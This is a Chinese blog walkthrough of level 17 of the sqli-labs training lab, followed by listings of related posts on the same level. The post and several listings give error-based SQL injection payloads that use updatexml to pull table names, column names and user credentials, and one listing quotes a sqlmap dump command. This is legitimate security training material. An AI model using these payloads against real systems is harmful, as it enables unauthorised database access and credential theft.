sqli-labs（17）

最新推荐文章于 2024-10-18 10:15:00 发布

原创最新推荐文章于 2024-10-18 10:15:00 发布 · 264 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全漏洞

本文介绍了在sqli-labs的Less-17关卡中遇到的POST注入问题，重点在于基于错误的更新查询。作者通过尝试找到注入点在password字段，并尝试爆破表名和列名，虽然遇到困难，但确认了思路的正确性，准备后续解决此问题。

Less-17 POST - Update Query- Error Based - String (基于错误的更新查询POST注入)

各种尝试一番，发现注入点在password处

uname=admin&passwd=1' and (updatexml(1,concat(0x5c,version(),0x5c),1))#submit=submit

在这里插入图片描述

uname=admin&passwd=1' and (updatexml(1,concat(0x5c,version(),0x5c),1))#submit=submit

在这里插入图片描述
套路都差不多了，开始爆表名

uname=admin&passwd=1' and (updatexml(1,concat(0x5c,(select table_name from information_schema.tables where table_schema='security' limit 4,1),0x5c),1))#submit=submit

在这里插入图片描述
爆破列名

uname=admin&passwd=1' and (updatexml(1,concat(0x5c,(select column_name from information_schema.columns where table_schema='security' limit 6,1),0x5c),1))#submit=submit

在这里插入图片描述

uname=admin&passwd=1' and (updatexml(1,concat(0x5c,(select column_name from information_schema.columns where table_schema='security' limit 7,1),0x5c),1))#submit=submit

在这里插入图片描述
把字段名爆了

uname=admin&passwd=1' and (updatexml(1,concat(0x5c,(select group_concat(username,password) from security.users ),0x5c),1))#submit=submit

在这里插入图片描述
思路没有错呀，这个肯定还有坑

语句都是正确的，搞的我一度怀疑人生，容我稍后来踩坑

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

jimggg

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

sqlilabs第17关

wh1sper、的博客

04-29

1425

sqlilabs第17关一、分析二、手注一、分析这关题目叫做基于报错的更新查新。遇事不决，就直接看源码。通过源码我们得知当我们输入数据进去时，会先查询users表与我们输入进去的用户名对比。如果没有这个用户，就会告诉你。（这肯定忍不了）相反他会检查用户名。在check_input中，我贴了函数的链接，师傅们比我总结的详细。 get_magic_quotes_gpc()函数 ctype_digit()函数二、手注 ...

网络安全 - Web 安全靶场 - sqli-labs-php7.zip

10-13

sqli-labs-php7.zip资源描述 sqli-labs-php7.zip是一个专注于SQL注入学习的资源包，特别适用于PHP 7.3及以上版本的环境。它提供了一个全面的练习平台，帮助用户深入理解SQL注入攻击的原理，并提升相应的防御技巧。 ...

参与评论您还未登录，请先登录后发表或查看评论

sqli-labs 17

m0_69548793的博客

08-27

1439

sqli-labs 17

SQLI-labs-第十七关

weixin_54055099的博客

05-16

1572

Sqli-labs第十七关，二次注入、报错注入

sqli-labs-----第17关

wyzhxhn的博客

11-10

972

基于报错的更新查新。

Sqlilabs-17

KAKA的博客

07-07

973

来到了 17 关，从这关开始刚学习需要借助源码来配合学习，本关学习内容是 update 内容从源码中可以看到，开发者的意图流程是：首先查询用户名相匹配的 users 表中数据，所以这里如果需要注入首先得有一个在数据库中已经有了的用户名，若是现实挖掘漏洞过程中这，如果可以，可以先自己先注册一个，这下在数据库中就躺着了一个可利用的用户名和密码…，没有的话可以盲猜，如一般都有 admin guest等等可以直接利用的… 继续往下看源码，你会发现 username 身上加了个check_input，转到

Sqli-labs-maste 靶场的下载， phpStudy 下载

09-13

"Sqli-labs-maste"是一个专门设计用来练习和提高SQL注入技术的靶场环境，它提供了各种不同难度级别的SQL注入漏洞供用户尝试解决，从而帮助学习者深入理解SQL注入的原理和防御技术。与此同时，"phpStudy"是一个流行...

sqli-labs-master 靶场环境

最新发布

08-30

sqli-labs-master 靶场环境

phpstudy+靶场sqli-labs-master下载

11-08

【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全，尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...

sqli-labs-master靶场

09-21

sqli-labs-master靶场是一个针对安全研究人员、开发者和网络安全爱好者的实践平台，特别设计用于学习和测试SQL注入攻击技术。SQL注入是一种常见的网络攻击手段，攻击者通过在应用程序的输入字段中注入恶意的SQL代码...

sqli-labs-Less-17

giun的博客

02-13

578

这一关与密码有关，我们尝试下报错输入username:admin password=1' 故对密码处理时应该使用“ 报错注入 username:admin password:1'and extractvalue(1,concat(0x7e,(select version()),0x7e))# version()可以换成其他语句进行注入延时注入 username:admin pass...

sqli-labs第十七关

m0_73248913的博客

02-11

441

sqli-labs第十七关教程

sql-labs靶场第十七关测试报告

ccc_9wy的博客

10-18

2038

sql-labs第十七关的测试报告；手工注入和sqlmap两种方法；靶场源代码分析；详细过程；报错注入。

sqli-labs通关（十七）

qq_65950075的博客

05-05

856

这一关跟前面的关卡都不一样，是全新的关卡，页面是一个密码重置页面，需要输入用户名，然后输入新的密码，就会把我们的旧密码替换掉。所以就会用到数据库的update更新数据，不再是前面的查询数据，所以之前的联合注入和布尔盲注以及时间盲注都不能用了。这里我们要用到之前使用过的报错注入。所以我们使用mid()函数来截取，因为是从32位开始不能看到，所以我们从第32位开始截取，截取后32位。这里要先输入正确的用户名，验证成功后才会把新密码替换，所以我们输入。但是回显并没有完全，因为报错回显只能回显32位。

sqli-labs练习（十七）--- POST-Update Query-Error Based-String

wkend的博客

07-28

536

在用万能密码进行登录的时候发现，username处无法绕过对密码的检查，总是登录失败。猜测后台对uname参数的值有过滤。导致无法注入。使用正常方式进行登录，发现在前台可以修改用户的密码。再次尝试，发现passwd出存在sql注入漏洞， payload：uname=admin&amp;passwd=123'&amp;submit=Submit，出现报错语句于是在passwd出...

Sqli-labs 17-19

Darklord.W

04-11

236

Sqli-labs 17-19 LESS-17- Update Query- Error Based - String (基于错误的更新查询POST注入) BP抓包使用updatexml进行报错注入： UPDATEXML (XML_document, XPath_string, new_value); 第一个参数：XML_document是String格式，为XML文档对象的...

sqli-labs-17

qq_53030229的博客

05-23

197

文章目录一、判断是否存在注入2、获取数据库一、判断是否存在注入通过审查源码，我们发现提交的代码没有经过过滤，我们·就使用hackbar来SQL注入吧！ 2、获取数据库 ' and (ascii(substr(database(),1,1))=115) and sleep(5) --+ ...

sqli-labs(17)

weixin_30855761的博客

05-26

110

0x01简介百度翻译了一下基于错误的更新查询字符型第一次遇到这种情况那我们先看看源代码行吧不懂函数的百度 $result=mysql_query($sql);//返回查询的数据的一个结果集，需要用php相应的mysql函数取值。比如mysql_fetch_array()这个函数。还有你说的前一节课用到的mysql_query()，这个函数是执行sql语句的，并...

sqli-labs第十七关详解

金帛的博客

04-26

5216

sqlilabs第十七关详解

sqli-labs17关

08-20

### sqli-labs 第17关解题步骤详解 sqli-labs 第17关的漏洞利用方式主要围绕**基于错误的注入**和**堆叠注入**展开。本关卡的注入点出现在登录表单中，攻击者可以通过构造恶意输入来绕过验证或获取数据库信息。 #### 1. 判断注入类型第17关是**POST型注入**，注入点位于登录框的用户名或密码输入处。由于页面不会直接显示数据库错误信息，因此需要通过**报错注入**或**时间盲注**来判断是否存在注入漏洞。例如，输入用户名 `' or 1=1 #`，如果系统返回错误信息或行为异常，则说明可能存在注入点。若无明显反馈，则需尝试报错注入语句，如： ```sql ' or updatexml(1,concat(0x7e,database(),0x7e),1) # ``` 该语句会触发 `XPATH` 错误，从而将数据库名显示在错误信息中 [^3]。 #### 2. 获取数据库信息在确认存在报错注入后，可以继续使用类似语句获取当前数据库名、用户名、版本等信息： ```sql ' or updatexml(1,concat(0x7e,user(),0x7e),1) # ' or updatexml(1,concat(0x7e,@@version,0x7e),1) # ``` 这些语句将分别返回当前数据库用户和 MySQL 版本信息 [^3]。 #### 3. 注入获取表名和列名在获取数据库名后，可以利用 `information_schema` 获取当前数据库中的表名和列名。例如： ```sql ' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) # ``` 上述语句将返回第一个表名，依次修改 `limit` 的偏移量可获取所有表名。获取表名后，再通过 `columns` 表获取列名： ```sql ' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e),1) # ``` #### 4. 获取敏感数据在获取表名和列名后，可以构造语句获取具体字段的数据，例如用户名和密码： ```sql ' or updatexml(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),1) # ``` 此语句将返回第一条记录的用户名和密码，通过调整 `limit` 的偏移量可以遍历整个表 [^3]。 #### 5. 使用 SQLMap 自动化注入若手动注入过程较为繁琐，也可以使用 SQLMap 自动化工具进行注入。例如： ```bash sqlmap.py -u "http://localhost/sqli-labs/Less-17/" --data="uname=admin&passwd=admin&submit=Submit" --method=POST --risk=3 --level=5 --dbs ``` 该命令将自动检测注入点，并列出数据库信息。进一步可使用 `--tables` 和 `--dump` 获取表结构和数据 [^2]。 ###